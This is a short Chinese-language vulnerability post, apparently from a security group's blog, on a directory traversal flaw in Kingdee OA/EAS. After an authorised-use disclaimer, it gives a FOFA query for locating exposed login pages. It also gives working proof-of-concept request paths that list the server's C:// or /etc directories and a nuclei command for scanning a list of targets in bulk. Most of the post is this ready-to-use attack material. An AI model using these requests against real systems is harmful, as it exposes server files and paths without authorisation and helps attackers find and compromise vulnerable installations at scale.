0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
金蝶oa在自动办公软件市场上有一定的优势和竞争力,其用户粉丝“爱屋及乌”,很大一部分是受惠于金蝶财务软件而钟情于金蝶oa。金蝶oa /appmonitor/protected/selector/server_file/files处存在目录遍历漏洞,攻击者可以从其中获取网站路径等敏感信息进一步攻击。
0x03 漏洞复现
fofa:title="EAS系统登录"
1.执行POC得到网站路径
windows:
/appmonitor/protected/selector/server_file/files?folder=C://&suffix=
linux:
/appmonitor/protected/selector/server_file/files?folder=/etc&suffix=
2.nuclei验证脚本已发表于知识星球
nuclei.exe -t JindieOA_files_directory_traversal.yaml -l subs.txt -stats